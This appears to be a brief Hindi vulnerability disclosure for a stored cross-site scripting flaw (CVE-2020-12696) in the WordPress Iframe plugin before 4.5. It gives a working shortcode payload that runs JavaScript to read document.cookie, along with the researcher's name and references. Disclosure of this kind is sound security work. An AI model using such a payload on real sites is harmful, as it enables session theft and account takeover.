
संग्रहीत क्रॉस-साइट स्क्रिप्टिंग - Iframe प्लगइन - WordPress
██╗ ██╗███████╗███████╗
╚██╗██╔╝██╔════╝██╔════╝
╚███╔╝ ███████╗███████╗
██╔██╗ ╚════██║╚════██║
██╔╝ ██╗███████║███████║
╚═╝ ╚═╝╚══════╝╚══════╝
Iframe < 4.5 - प्रमाणित संग्रहीत क्रॉस-साइट स्क्रिप्टिंग (XSS)
Iframe प्लगिन 4.5 से पहले एक URL को स्वच्छ नहीं करता है।
पेलोड: </b>[iframe src="javascript:confirm(document.cookie)" width="100%" height="500"]
संस्करण [प्लगिन]: </b>4.4
परीक्षण किया गया: </b>WordPress 5.2.4
शोधकर्ता:</b> Guilherme Rubert
संदर्भ:
https://guilhermerubert.com/blog/cve-2020-12696/
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12696
https://wordpress.org/plugins/iframe/#developers